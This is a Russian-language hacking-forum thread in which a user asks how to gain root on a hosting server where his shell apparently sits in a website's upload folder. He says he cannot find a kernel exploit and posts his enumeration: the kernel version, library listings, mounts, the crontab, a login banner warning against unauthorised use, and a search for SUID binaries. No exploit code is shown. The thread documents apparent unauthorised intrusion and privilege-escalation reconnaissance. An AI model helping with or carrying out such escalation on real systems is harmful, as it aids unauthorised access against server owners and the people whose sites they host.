и тут список

Пардон, амиго. Вот вся инфа. Под это ядро не могу найти сплойт. Как тут рутать?

Code:
/home/jezbay19/public_html/upload/documents/>uname -a
Linux ip-192-169-232-139.secureserver.net 2.6.32-042stab133.2 #1 SMP Mon Aug 27 21:07:08 MSK 2018 x86_64 x86_64 x86_64 GNU/Linux

Code:
/home/jezbay19/public_html/upload/documents/>ls -la /boot
total 12
dr-xr-xr-x 3 root root 4096 Sep 30 2014 .
dr-xr-xr-x 27 root root 4096 Jun 18 12:40 ..
drwxr-xr-x 2 root root 4096 Sep 30 2014 grub

Code:
/home/jezbay19/public_html/upload/documents/>ls -la --full-time /lib

.SpoilerTarget" type="button">Spoiler: Output

Code:
total 7400
dr-xr-xr-x 9 root root 4096 2019-04-11 00:11:42.944640457 +0300 .
dr-xr-xr-x 27 root root 4096 2019-06-18 12:40:48.190594126 +0300 ..
lrwxrwxrwx 1 root root 14 2018-07-04 00:12:43.364489805 +0300 cpp -> ../usr/bin/cpp
drwxr-xr-x 2 root root 4096 2016-09-06 17:51:57.000000000 +0300 firmware
drwxr-xr-x 3 root root 4096 2019-04-09 20:07:31.000000000 +0300 i686
-rwxr-xr-x 1 root root 145768 2019-04-09 20:30:42.000000000 +0300 ld-2.12.so
lrwxrwxrwx 1 root root 10 2019-04-11 00:11:42.785639229 +0300 ld-linux.so.2 -> ld-2.12.so
-rwxr-xr-x 1 root root 7636 2019-04-09 20:30:40.000000000 +0300 libBrokenLocale-2.12.so
lrwxrwxrwx 1 root root 23 2019-04-11 00:11:42.785639229 +0300 libBrokenLocale.so.1 -> libBrokenLocale-2.12.so
-rwxr-xr-x 1 root root 20804 2019-04-09 20:30:43.000000000 +0300 libSegFault.so
lrwxrwxrwx 1 root root 15 2017-08-25 00:11:51.000000000 +0300 libacl.so.1 -> libacl.so.1.1.0
-rwxr-xr-x 1 root root 30364 2017-08-22 23:12:06.000000000 +0300 libacl.so.1.1.0
-rwxr-xr-x 1 root root 13896 2019-04-09 20:30:41.000000000 +0300 libanl-2.12.so
lrwxrwxrwx 1 root root 14 2019-04-11 00:11:42.787639245 +0300 libanl.so.1 -> libanl-2.12.so
lrwxrwxrwx 1 root root 16 2014-03-04 20:07:46.000000000 +0400 libattr.so.1 -> libattr.so.1.1.0
-rwxr-xr-x 1 root root 17904 2011-09-23 22:52:26.000000000 +0400 libattr.so.1.1.0
lrwxrwxrwx 1 root root 15 2014-03-04 20:07:12.000000000 +0400 libbz2.so.1 -> libbz2.so.1.0.4
-rwxr-xr-x 1 root root 70464 2011-06-25 05:44:14.000000000 +0400 libbz2.so.1.0.4
-rwxr-xr-x 1 root root 1909464 2019-04-09 20:30:40.000000000 +0300 libc-2.12.so
lrwxrwxrwx 1 root root 12 2019-04-11 00:11:42.885640001 +0300 libc.so.6 -> libc-2.12.so
-rwxr-xr-x 1 root root 195532 2019-04-09 20:30:43.000000000 +0300 libcidn-2.12.so
lrwxrwxrwx 1 root root 15 2019-04-11 00:11:42.893640063 +0300 libcidn.so.1 -> libcidn-2.12.so
lrwxrwxrwx 1 root root 17 2018-07-04 00:12:51.154549407 +0300 libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 13836 2018-06-19 18:44:11.000000000 +0300 libcom_err.so.2.1
-rwxr-xr-x 1 root root 38824 2019-04-09 20:30:40.000000000 +0300 libcrypt-2.12.so
lrwxrwxrwx 1 root root 16 2019-04-11 00:11:42.895640079 +0300 libcrypt.so.1 -> libcrypt-2.12.so
-rwxr-xr-x 1 root root 18352 2019-04-09 20:30:41.000000000 +0300 libdl-2.12.so
lrwxrwxrwx 1 root root 13 2019-04-11 00:11:42.896640086 +0300 libdl.so.2 -> libdl-2.12.so
lrwxrwxrwx 1 root root 13 2018-07-04 00:13:23.533797140 +0300 libe2p.so.2 -> libe2p.so.2.3
-rwxr-xr-x 1 root root 26836 2018-06-19 18:44:11.000000000 +0300 libe2p.so.2.3
lrwxrwxrwx 1 root root 16 2018-07-04 00:13:23.535797156 +0300 libext2fs.so.2 -> libext2fs.so.2.4
-rwxr-xr-x 1 root root 211928 2018-06-19 18:44:11.000000000 +0300 libext2fs.so.2.4
-rw-r--r-- 1 root root 899 2016-07-12 18:29:13.000000000 +0300 libfreebl3.chk
-rwxr-xr-x 1 root root 9604 2016-07-12 18:29:13.000000000 +0300 libfreebl3.so
-rw-r--r-- 1 root root 899 2016-07-12 18:29:13.000000000 +0300 libfreeblpriv3.chk
-rwxr-xr-x 1 root root 378504 2016-07-12 18:29:13.000000000 +0300 libfreeblpriv3.so
-rwxr-xr-x 1 root root 120672 2018-06-19 15:46:36.000000000 +0300 libgcc_s-4.4.7-20120601.so.1
lrwxrwxrwx 1 root root 28 2018-07-04 00:12:51.189549675 +0300 libgcc_s.so.1 -> libgcc_s-4.4.7-20120601.so.1
lrwxrwxrwx 1 root root 22 2018-07-04 00:13:23.578797485 +0300 libgio-2.0.so.0 -> libgio-2.0.so.0.2800.8
-rwxr-xr-x 1 root root 1188592 2018-06-19 18:50:06.000000000 +0300 libgio-2.0.so.0.2800.8
lrwxrwxrwx 1 root root 23 2018-07-04 00:13:23.635797921 +0300 libglib-2.0.so.0 -> libglib-2.0.so.0.2800.8
-rwxr-xr-x 1 root root 1166600 2018-06-19 18:50:06.000000000 +0300 libglib-2.0.so.0.2800.8
lrwxrwxrwx 1 root root 26 2018-07-04 00:13:23.698798403 +0300 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.2800.8
-rwxr-xr-x 1 root root 10444 2018-06-19 18:50:06.000000000 +0300 libgmodule-2.0.so.0.2800.8
lrwxrwxrwx 1 root root 26 2018-07-04 00:13:23.699798410 +0300 libgobject-2.0.so.0 -> libgobject-2.0.so.0.2800.8
-rwxr-xr-x 1 root root 308196 2018-06-19 18:50:06.000000000 +0300 libgobject-2.0.so.0.2800.8
lrwxrwxrwx 1 root root 26 2018-07-04 00:13:23.715798533 +0300 libgthread-2.0.so.0 -> libgthread-2.0.so.0.2800.8
-rwxr-xr-x 1 root root 15520 2018-06-19 18:50:06.000000000 +0300 libgthread-2.0.so.0.2800.8
-rwxr-xr-x 1 root root 200624 2019-04-09 20:30:43.000000000 +0300 libm-2.12.so
lrwxrwxrwx 1 root root 12 2019-04-11 00:11:42.907640171 +0300 libm.so.6 -> libm-2.12.so
lrwxrwxrwx 1 root root 17 2015-08-07 00:12:49.000000000 +0300 libncurses.so.5 -> libncurses.so.5.7
-rwxr-xr-x 1 root root 139628 2015-03-16 11:51:20.000000000 +0300 libncurses.so.5.7
lrwxrwxrwx 1 root root 18 2015-08-07 00:12:49.000000000 +0300 libncursesw.so.5 -> libncursesw.so.5.7
-rwxr-xr-x 1 root root 195244 2015-03-16 11:51:20.000000000 +0300 libncursesw.so.5.7
-rwxr-xr-x 1 root root 114356 2019-04-09 20:30:42.000000000 +0300 libnsl-2.12.so
lrwxrwxrwx 1 root root 14 2019-04-11 00:11:42.913640217 +0300 libnsl.so.1 -> libnsl-2.12.so
-rwxr-xr-x 1 root root 40652 2019-04-09 20:30:40.000000000 +0300 libnss_compat-2.12.so
lrwxrwxrwx 1 root root 21 2019-04-11 00:11:42.915640232 +0300 libnss_compat.so.2 -> libnss_compat-2.12.so
-rwxr-xr-x 1 root root 26040 2019-04-09 20:30:39.000000000 +0300 libnss_dns-2.12.so
lrwxrwxrwx 1 root root 18 2019-04-11 00:11:42.917640248 +0300 libnss_dns.so.2 -> libnss_dns-2.12.so
-rwxr-xr-x 1 root root 59172 2019-04-09 20:30:41.000000000 +0300 libnss_files-2.12.so
lrwxrwxrwx 1 root root 20 2019-04-11 00:11:42.920640272 +0300 libnss_files.so.2 -> libnss_files-2.12.so
-rwxr-xr-x 1 root root 22584 2019-04-09 20:30:43.000000000 +0300 libnss_hesiod-2.12.so
lrwxrwxrwx 1 root root 21 2019-04-11 00:11:42.921640280 +0300 libnss_hesiod.so.2 -> libnss_hesiod-2.12.so
-rwxr-xr-x 1 root root 50164 2019-04-09 20:30:41.000000000 +0300 libnss_nis-2.12.so
lrwxrwxrwx 1 root root 18 2019-04-11 00:11:42.924640301 +0300 libnss_nis.so.2 -> libnss_nis-2.12.so
-rwxr-xr-x 1 root root 59156 2019-04-09 20:30:39.000000000 +0300 libnss_nisplus-2.12.so
lrwxrwxrwx 1 root root 22 2019-04-11 00:11:42.927640325 +0300 libnss_nisplus.so.2 -> libnss_nisplus-2.12.so
-rwxr-xr-x 1 root root 131848 2019-04-09 20:30:39.000000000 +0300 libpthread-2.12.so
lrwxrwxrwx 1 root root 18 2019-04-11 00:11:42.934640379 +0300 libpthread.so.0 -> libpthread-2.12.so
-rwxr-xr-x 1 root root 107936 2019-04-09 20:30:43.000000000 +0300 libresolv-2.12.so
lrwxrwxrwx 1 root root 17 2019-04-11 00:11:42.940640426 +0300 libresolv.so.2 -> libresolv-2.12.so
-rwxr-xr-x 1 root root 40268 2019-04-09 20:30:41.000000000 +0300 librt-2.12.so
lrwxrwxrwx 1 root root 13 2019-04-11 00:11:42.942640441 +0300 librt.so.1 -> librt-2.12.so
-rwxr-xr-x 1 root root 124884 2016-05-11 01:58:32.000000000 +0300 libselinux.so.1
-rwxr-xr-x 1 root root 32072 2019-04-09 20:30:43.000000000 +0300 libthread_db-1.0.so
lrwxrwxrwx 1 root root 19 2019-04-11 00:11:42.944640457 +0300 libthread_db.so.1 -> libthread_db-1.0.so
lrwxrwxrwx 1 root root 15 2015-08-07 00:12:49.000000000 +0300 libtinfo.so.5 -> libtinfo.so.5.7
-rwxr-xr-x 1 root root 97832 2015-03-16 11:51:20.000000000 +0300 libtinfo.so.5.7
-rwxr-xr-x 1 root root 13224 2019-04-09 20:30:41.000000000 +0300 libutil-2.12.so
lrwxrwxrwx 1 root root 15 2019-04-11 00:11:42.944640457 +0300 libutil.so.1 -> libutil-2.12.so
lrwxrwxrwx 1 root root 13 2014-03-04 20:07:45.000000000 +0400 libz.so.1 -> libz.so.1.2.3
-rwxr-xr-x 1 root root 75384 2013-02-22 03:01:21.000000000 +0400 libz.so.1.2.3
dr-xr-xr-x 6 root root 4096 2018-12-30 15:23:18.494131877 +0300 modules
drwxr-xr-x 3 root root 4096 2019-04-11 00:11:42.947640480 +0300 rtkaio
drwxr-xr-x 2 root root 4096 2017-03-22 11:56:22.000000000 +0300 security
drwxr-xr-x 6 root root 4096 2015-03-16 11:53:51.000000000 +0300 terminfo
drwxr-xr-x 5 root root 4096 2018-07-04 00:12:45.369505146 +0300 udev

Code:
/home/jezbay19/public_html/upload/documents/>mount
/dev/ploop16584p1 on / type ext4 (rw,relatime,barrier=1,data=ordered,balloon_ino=12 ,jqfmt=vfsv0,usrjquota=aquota.user,grpjquota=aquot a.group)
proc on /proc type proc (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
none on /dev type devtmpfs (rw,relatime,mode=755)
none on /dev/pts type devpts (rw,relatime,gid=5,mode=620,ptmxmode=000)
none on /dev/shm type tmpfs (rw,relatime)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)

Code:
/home/jezbay19/public_html/upload/documents/> df -h
Filesystem Size Used Avail Use% Mounted on
/dev/ploop16584p1 120G 82G 32G 72% /
none 2.0G 8.0K 2.0G 1% /dev
none 2.0G 0 2.0G 0% /dev/shm

Code:
/home/jezbay19/public_html/upload/documents/>cat /etc/issue

.SpoilerTarget" type="button">Spoiler: output
This computer system is for authorized users only. Individuals using this

system without authority or in excess of their authority are subject to

having all their activities on this system monitored and recorded or

examined by any authorized person, including law enforcement, as system

personnel deem appropriate. In the course of monitoring individuals

improperly using the system or in the course of system maintenance, the

activities of authorized users may also be monitored and recorded. Any

material so recorded may be disclosed as appropriate. Anyone using this

system consents to these terms.

Code:
/home/jezbay19/public_html/upload/documents/>cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed

BenderMR

02.07.2019, 12:06

и вот последняя команда

Code:
/etc/>find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null

.SpoilerTarget" type="button">Spoiler: output

Code:
find: `/lost+found': Permission denied
find: `/root': Permission denied
find: `/etc/dhcp': Permission denied
find: `/etc/mail/spamassassin/sa-update-keys': Permission denied
find: `/etc/cpanel': Permission denied
find: `/etc/named': Permission denied
find: `/etc/vdomainaliases': Permission denied
find: `/etc/pki/rsyslog': Permission denied
find: `/etc/pki/CA/private': Permission denied
find: `/etc/proftpd': Permission denied
find: `/etc/sudoers.d': Permission denied
-rwsr-xr-x 1 root root 34840 Mar 22 2017 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 10272 Mar 22 2017 /sbin/pam_timestamp_check
find: `/proc/vz/vzaquota': Permission denied
find: `/proc/1/task/1/fd': Permission denied
find: `/proc/1/task/1/fdinfo': Permission denied
find: `/proc/1/task/1/ns': Permission denied
find: `/proc/1/fd': Permission denied
find: `/proc/1/fdinfo': Permission denied
find: `/proc/1/ns': Permission denied
find: `/proc/2/task/2/fd': Permission denied
find: `/proc/2/task/2/fdinfo': Permission denied
find: `/proc/2/task/2/ns': Permission denied
find: `/proc/2/fd': Permission denied
find: `/proc/2/fdinfo': Permission denied
find: `/proc/2/ns': Permission denied
find: `/proc/3/task/3/fd': Permission denied
find: `/proc/3/task/3/fdinfo': Permission denied
find: `/proc/3/task/3/ns': Permission denied
find: `/proc/3/fd': Permission denied
find: `/proc/3/fdinfo': Permission denied
find: `/proc/3/ns': Permission denied
find: `/proc/151/task/151/fd': Permission denied
find: `/proc/151/task/151/fdinfo': Permission denied
find: `/proc/151/task/151/ns': Permission denied
find: `/proc/151/fd': Permission denied
find: `/proc/151/fdinfo': Permission denied
find: `/proc/151/ns': Permission denied
find: `/proc/1189/task/1189/fd': Permission denied
find: `/proc/1189/task/1189/fdinfo': Permission denied
find: `/proc/1189/task/1189/ns': Permission denied
find: `/proc/1189/fd': Permission denied
find: `/proc/1189/fdinfo': Permission denied
find: `/proc/1189/ns': Permission denied
find: `/proc/1399/task/1399/fd': Permission denied
find: `/proc/1399/task/1399/fdinfo': Permission denied
find: `/proc/1399/task/1399/ns': Permission denied
find: `/proc/1399/fd': Permission denied
find: `/proc/1399/fdinfo': Permission denied
find: `/proc/1399/ns': Permission denied
find: `/proc/1400/task/1400/fd': Permission denied
find: `/proc/1400/task/1400/fdinfo': Permission denied
find: `/proc/1400/task/1400/ns': Permission denied
find: `/proc/1400/fd': Permission denied
find: `/proc/1400/fdinfo': Permission denied
find: `/proc/1400/ns': Permission denied
find: `/proc/1472/task/1472/fd': Permission denied
find: `/proc/1472/task/1472/fdinfo': Permission denied
find: `/proc/1472/task/1472/ns': Permission denied
find: `/proc/1472/fd': Permission denied
find: `/proc/1472/fdinfo': Permission denied
find: `/proc/1472/ns': Permission denied
find: `/proc/1487/task/1487/fd': Permission denied
find: `/proc/1487/task/1487/fdinfo': Permission denied
find: `/proc/1487/task/1487/ns': Permission denied
find: `/proc/1487/fd': Permission denied
find: `/proc/1487/fdinfo': Permission denied
find: `/proc/1487/ns': Permission denied
find: `/proc/1583/task/1583/fd': Permission denied
find: `/proc/1583/task/1583/fdinfo': Permission denied
find: `/proc/1583/task/1583/ns': Permission denied
find: `/proc/1583/fd': Permission denied
find: `/proc/1583/fdinfo': Permission denied
find: `/proc/1583/ns': Permission denied
find: `/proc/1605/task/1605/fd': Permission denied
find: `/proc/1605/task/1605/fdinfo': Permission denied
find: `/proc/1605/task/1605/ns': Permission denied
find: `/proc/1605/fd': Permission denied
find: `/proc/1605/fdinfo': Permission denied
find: `/proc/1605/ns': Permission denied
find: `/proc/1686/task/1686/fd': Permission denied
find: `/proc/1686/task/1686/fdinfo': Permission denied
find: `/proc/1686/task/1686/ns': Permission denied
find: `/proc/1686/fd': Permission denied
find: `/proc/1686/fdinfo': Permission denied
find: `/proc/1686/ns': Permission denied
find: `/proc/1687/task/1687/fd': Permission denied
find: `/proc/1687/task/1687/fdinfo': Permission denied
find: `/proc/1687/task/1687/ns': Permission denied
find: `/proc/1687/fd': Permission denied
find: `/proc/1687/fdinfo': Permission denied
find: `/proc/1687/ns': Permission denied
find: `/proc/2827/task/2827/fd': Permission denied
find: `/proc/2827/task/2827/fdinfo': Permission denied
find: `/proc/2827/task/2827/ns': Permission denied
find: `/proc/2827/task/2828/fd': Permission denied
find: `/proc/2827/task/2828/fdinfo': Permission denied
find: `/proc/2827/task/2828/ns': Permission denied
find: `/proc/2827/task/2829/fd': Permission denied
find: `/proc/2827/task/2829/fdinfo': Permission denied
find: `/proc/2827/task/2829/ns': Permission denied
find: `/proc/2827/task/2830/fd': Permission denied
find: `/proc/2827/task/2830/fdinfo': Permission denied
find: `/proc/2827/task/2830/ns': Permission denied
find: `/proc/2827/task/2831/fd': Permission denied
find: `/proc/2827/task/2831/fdinfo': Permission denied
find: `/proc/2827/task/2831/ns': Permission denied
find: `/proc/2827/task/2832/fd': Permission denied
find: `/proc/2827/task/2832/fdinfo': Permission denied
find: `/proc/2827/task/2832/ns': Permission denied
find: `/proc/2827/task/2833/fd': Permission denied
find: `/proc/2827/task/2833/fdinfo': Permission denied
find: `/proc/2827/task/2833/ns': Permission denied
find: `/proc/2827/task/2834/fd': Permission denied
find: `/proc/2827/task/2834/fdinfo': Permission denied
find: `/proc/2827/task/2834/ns': Permission denied
find: `/proc/2827/task/2835/fd': Permission denied
find: `/proc/2827/task/2835/fdinfo': Permission denied
find: `/proc/2827/task/2835/ns': Permission denied
find: `/proc/2827/task/2836/fd': Permission denied
find: `/proc/2827/task/2836/fdinfo': Permission denied
find: `/proc/2827/task/2836/ns': Permission denied
find: `/proc/2827/task/2837/fd': Permission denied
find: `/proc/2827/task/2837/fdinfo': Permission denied
find: `/proc/2827/task/2837/ns': Permission denied
find: `/proc/2827/task/2838/fd': Permission denied
find: `/proc/2827/task/2838/fdinfo': Permission denied
find: `/proc/2827/task/2838/ns': Permission denied
find: `/proc/2827/task/2839/fd': Permission denied
find: `/proc/2827/task/2839/fdinfo': Permission denied
find: `/proc/2827/task/2839/ns': Permission denied
find: `/proc/2827/task/2840/fd': Permission denied
find: `/proc/2827/task/2840/fdinfo': Permission denied
find: `/proc/2827/task/2840/ns': Permission denied
find: `/proc/2827/task/2841/fd': Permission denied
find: `/proc/2827/task/2841/fdinfo': Permission denied
find: `/proc/2827/task/2841/ns': Permission denied
find: `/proc/2827/task/2842/fd': Permission denied
find: `/proc/2827/task/2842/fdinfo': Permission denied
find: `/proc/2827/task/2842/ns': Permission denied
find: `/proc/2827/task/2843/fd': Permission denied
find: `/proc/2827/task/2843/fdinfo': Permission denied
find: `/proc/2827/task/2843/ns': Permission denied
find: `/proc/2827/task/2844/fd': Permission denied
find: `/proc/2827/task/2844/fdinfo': Permission denied
find: `/proc/2827/task/2844/ns': Permission denied
find: `/proc/2827/task/2845/fd': Permission denied
find: `/proc/2827/task/2845/fdinfo': Permission denied
find: `/proc/2827/task/2845/ns': Permission denied
find: `/proc/2827/task/2846/fd': Permission denied
find: `/proc/2827/task/2846/fdinfo': Permission denied
find: `/proc/2827/task/2846/ns': Permission denied
find: `/proc/2827/task/2847/fd': Permission denied
find: `/proc/2827/task/2847/fdinfo': Permission denied
find: `/proc/2827/task/2847/ns': Permission denied
find: `/proc/2827/task/2848/fd': Permission denied
find: `/proc/2827/task/2848/fdinfo': Permission denied
find: `/proc/2827/task/2848/ns': Permission denied
find: `/proc/2827/task/2849/fd': Permission denied
find: `/proc/2827/task/2849/fdinfo': Permission denied
find: `/proc/2827/task/2849/ns': Permission denied
find: `/proc/2827/task/2850/fd': Permission denied
find: `/proc/2827/task/2850/fdinfo': Permission denied
find: `/proc/2827/task/2850/ns': Permission denied
find: `/proc/2827/task/2851/fd': Permission denied
find: `/proc/2827/task/2851/fdinfo': Permission denied
find: `/proc/2827/task/2851/ns': Permission denied
find: `/proc/2827/task/2852/fd': Permission denied
find: `/proc/2827/task/2852/fdinfo': Permission denied
find: `/proc/2827/task/2852/ns': Permission denied
find: `/proc/2827/task/2853/fd': Permission denied
find: `/proc/2827/task/2853/fdinfo': Permission denied
find: `/proc/2827/task/2853/ns': Permission denied
find: `/proc/2827/fd': Permission denied
find: `/proc/2827/fdinfo': Permission denied
find: `/proc/2827/ns': Permission denied
find: `/proc/3004/task/3004/fd': Permission denied
find: `/proc/3004/task/3004/fdinfo': Permission denied
find: `/proc/3004/task/3004/ns': Permission denied
find: `/proc/3004/fd': Permission denied
find: `/proc/3004/fdinfo': Permission denied
find: `/proc/3004/ns': Permission denied
find: `/proc/4876/task/4876/fd': Permission denied
find: `/proc/4876/task/4876/fdinfo': Permission denied
find: `/proc/4876/task/4876/ns': Permission denied
find: `/proc/4876/fd': Permission denied
find: `/proc/4876/fdinfo': Permission denied
find: `/proc/4876/ns': Permission denied
find: `/proc/4878/task/4878/fd': Permission denied
find: `/proc/4878/task/4878/fdinfo': Permission denied
find: `/proc/4878/task/4878/ns': Permission denied
find: `/proc/4878/fd': Permission denied
find: `/proc/4878/fdinfo': Permission denied
find: `/proc/4878/ns': Permission denied
find: `/proc/14701/task/14701/fd': Permission denied
find: `/proc/14701/task/14701/fdinfo': Permission denied
find: `/proc/14701/task/14701/ns': Permission denied
find: `/proc/14701/fd': Permission denied
find: `/proc/14701/fdinfo': Permission denied
find: `/proc/14701/ns': Permission denied
find: `/proc/15099/task/15099/fd': Permission denied
find: `/proc/15099/task/15099/fdinfo': Permission denied
find: `/proc/15099/task/15099/ns': Permission denied
find: `/proc/15099/fd': Permission denied
find: `/proc/15099/fdinfo': Permission denied
find: `/proc/15099/ns': Permission denied
find: `/proc/15108/task/15108/fd': Permission denied
find: `/proc/15108/task/15108/fdinfo': Permission denied
find: `/proc/15108/task/15108/ns': Permission denied
find: `/proc/15108/fd': Permission denied
find: `/proc/15108/fdinfo': Permission denied
find: `/proc/15108/ns': Permission denied
find: `/proc/15125/task/15125/fd': Permission denied
find: `/proc/15125/task/15125/fdinfo': Permission denied
find: `/proc/15125/task/15125/ns': Permission denied
find: `/proc/15125/fd': Permission denied
find: `/proc/15125/fdinfo': Permission denied
find: `/proc/15125/ns': Permission denied
find: `/proc/15133/task/15133/fd': Permission denied
find: `/proc/15133/task/15133/fdinfo': Permission denied
find: `/proc/15133/task/15133/ns': Permission denied
find: `/proc/15133/fd': Permission denied
find: `/proc/15133/fdinfo': Permission denied
find: `/proc/15133/ns': Permission denied
find: `/proc/15139/task/15139/fd': Permission denied
find: `/proc/15139/task/15139/fdinfo': Permission denied
find: `/proc/15139/task/15139/ns': Permission denied
find: `/proc/15139/fd': Permission denied
find: `/proc/15139/fdinfo': Permission denied
find: `/proc/15139/ns': Permission denied
find: `/proc/15146/task/15146/fd': Permission denied
find: `/proc/15146/task/15146/fdinfo': Permission denied
find: `/proc/15146/task/15146/ns': Permission denied
find: `/proc/15146/fd': Permission denied
find: `/proc/15146/fdinfo': Permission denied
find: `/proc/15146/ns': Permission denied
find: `/proc/15653/task/15653/fd': Permission denied
find: `/proc/15653/task/15653/fdinfo': Permission denied
find: `/proc/15653/task/15653/ns': Permission denied
find: `/proc/15653/fd': Permission denied
find: `/proc/15653/fdinfo': Permission denied
find: `/proc/15653/ns': Permission denied
find: `/proc/15654/task/15654/fd': Permission denied
find: `/proc/15654/task/15654/fdinfo': Permission denied
find: `/proc/15654/task/15654/ns': Permission denied
find: `/proc/15654/fd': Permission denied
find: `/proc/15654/fdinfo': Permission denied
find: `/proc/15654/ns': Permission denied
find: `/proc/15655/task/15655/fd': Permission denied
find: `/proc/15655/task/15655/fdinfo': Permission denied
find: `/proc/15655/task/15655/ns': Permission denied
find: `/proc/15655/fd': Permission denied
find: `/proc/15655/fdinfo': Permission denied
find: `/proc/15655/ns': Permission denied
find: `/proc/15657/task/15657/fd': Permission denied
find: `/proc/15657/task/15657/fdinfo': Permission denied
find: `/proc/15657/task/15657/ns': Permission denied
find: `/proc/15657/fd': Permission denied
find: `/proc/15657/fdinfo': Permission denied
find: `/proc/15657/ns': Permission denied
find: `/proc/15658/task/15658/fd': Permission denied
find: `/proc/15658/task/15658/fdinfo': Permission denied
find: `/proc/15658/task/15658/ns': Permission denied
find: `/proc/15658/fd': Permission denied
find: `/proc/15658/fdinfo': Permission denied
find: `/proc/15658/ns': Permission denied
find: `/proc/15659/task/15659/fd': Permission denied
find: `/proc/15659/task/15659/fdinfo': Permission denied
find: `/proc/15659/task/15659/ns': Permission denied
find: `/proc/15659/fd': Permission denied
find: `/proc/15659/fdinfo': Permission denied
find: `/proc/15659/ns': Permission denied
find: `/proc/15661/task/15661/fd': Permission denied
find: `/proc/15661/task/15661/fdinfo': Permission denied
find: `/proc/15661/task/15661/ns': Permission denied
find: `/proc/15661/fd': Permission denied
find: `/proc/15661/fdinfo': Permission denied
find: `/proc/15661/ns': Permission denied
find: `/proc/15662/task/15662/fd': Permission denied
find: `/proc/15662/task/15662/fdinfo': Permission denied
find: `/proc/15662/task/15662/ns': Permission denied
find: `/proc/15662/fd': Permission denied
find: `/proc/15662/fdinfo': Permission denied
find: `/proc/15662/ns': Permission denied
find: `/proc/15663/task/15663/fd': Permission denied
find: `/proc/15663/task/15663/fdinfo': Permission denied
find: `/proc/15663/task/15663/ns': Permission denied
find: `/proc/15663/fd': Permission denied
find: `/proc/15663/fdinfo': Permission denied
find: `/proc/15663/ns': Permission denied
find: `/proc/15664/task/15664/fd': Permission denied
find: `/proc/15664/task/15664/fdinfo': Permission denied
find: `/proc/15664/task/15664/ns': Permission denied
find: `/proc/15664/fd': Permission denied
find: `/proc/15664/fdinfo': Permission denied
find: `/proc/15664/ns': Permission denied
find: `/proc/16180/task/16180/fd': Permission denied
find: `/proc/16180/task/16180/fdinfo': Permission denied
find: `/proc/16180/task/16180/ns': Permission denied
find: `/proc/16180/fd': Permission denied
find: `/proc/16180/fdinfo': Permission denied
find: `/proc/16180/ns': Permission denied
find: `/proc/16314/task/16314/fd': Permission denied
find: `/proc/16314/task/16314/fdinfo': Permission denied
find: `/proc/16314/task/16314/ns': Permission denied
find: `/proc/16314/fd': Permission denied
find: `/proc/16314/fdinfo': Permission denied
find: `/proc/16314/ns': Permission denied
find: `/proc/16527/task/16527/fd': Permission denied
find: `/proc/16527/task/16527/fdinfo': Permission denied
find: `/proc/16527/task/16527/ns': Permission denied
find: `/proc/16527/fd': Permission denied
find: `/proc/16527/fdinfo': Permission denied
find: `/proc/16527/ns': Permission denied
find: `/proc/16530/task/16530/fd': Permission denied

BenderMR

02.07.2019, 12:12

.SpoilerTarget" type="button">Spoiler: продолжение

Code:
ind: `/proc/16530/task/16530/fdinfo': Permission denied
find: `/proc/16530/task/16530/ns': Permission denied
find: `/proc/16530/fd': Permission denied
find: `/proc/16530/fdinfo': Permission denied
find: `/proc/16530/ns': Permission denied
find: `/proc/16986/task/16986/fd': Permission denied
find: `/proc/16986/task/16986/fdinfo': Permission denied
find: `/proc/16986/task/16986/ns': Permission denied
find: `/proc/16986/fd': Permission denied
find: `/proc/16986/fdinfo': Permission denied
find: `/proc/16986/ns': Permission denied
find: `/proc/17025/task/17025/fd': Permission denied
find: `/proc/17025/task/17025/fdinfo': Permission denied
find: `/proc/17025/task/17025/ns': Permission denied
find: `/proc/17025/fd': Permission denied
find: `/proc/17025/fdinfo': Permission denied
find: `/proc/17025/ns': Permission denied
find: `/proc/17037/task/17037/fd': Permission denied
find: `/proc/17037/task/17037/fdinfo': Permission denied
find: `/proc/17037/task/17037/ns': Permission denied
find: `/proc/17037/fd': Permission denied
find: `/proc/17037/fdinfo': Permission denied
find: `/proc/17037/ns': Permission denied
find: `/proc/17038/task/17038/fd': Permission denied
find: `/proc/17038/task/17038/fdinfo': Permission denied
find: `/proc/17038/task/17038/ns': Permission denied
find: `/proc/17038/fd': Permission denied
find: `/proc/17038/fdinfo': Permission denied
find: `/proc/17038/ns': Permission denied
find: `/proc/17415/task/17415/fd': Permission denied
find: `/proc/17415/task/17415/fdinfo': Permission denied
find: `/proc/17415/task/17415/ns': Permission denied
find: `/proc/17415/fd': Permission denied
find: `/proc/17415/fdinfo': Permission denied
find: `/proc/17415/ns': Permission denied
find: `/proc/17446/task/17446/fd': Permission denied
find: `/proc/17446/task/17446/fdinfo': Permission denied
find: `/proc/17446/task/17446/ns': Permission denied
find: `/proc/17446/fd': Permission denied
find: `/proc/17446/fdinfo': Permission denied
find: `/proc/17446/ns': Permission denied
find: `/proc/17447/task/17447/fd': Permission denied
find: `/proc/17447/task/17447/fdinfo': Permission denied
find: `/proc/17447/task/17447/ns': Permission denied
find: `/proc/17447/fd': Permission denied
find: `/proc/17447/fdinfo': Permission denied
find: `/proc/17447/ns': Permission denied
find: `/proc/17508/task/17508/fd': Permission denied
find: `/proc/17508/task/17508/fdinfo': Permission denied
find: `/proc/17508/task/17508/ns': Permission denied
find: `/proc/17508/fd': Permission denied
find: `/proc/17508/fdinfo': Permission denied
find: `/proc/17508/ns': Permission denied
find: `/proc/17594/task/17594/fd': Permission denied
find: `/proc/17594/task/17594/fdinfo': Permission denied
find: `/proc/17594/task/17594/ns': Permission denied
find: `/proc/17594/fd': Permission denied
find: `/proc/17594/fdinfo': Permission denied
find: `/proc/17594/ns': Permission denied
find: `/proc/18061/task/18061/fd': Permission denied
find: `/proc/18061/task/18061/fdinfo': Permission denied
find: `/proc/18061/task/18061/ns': Permission denied
find: `/proc/18061/fd': Permission denied
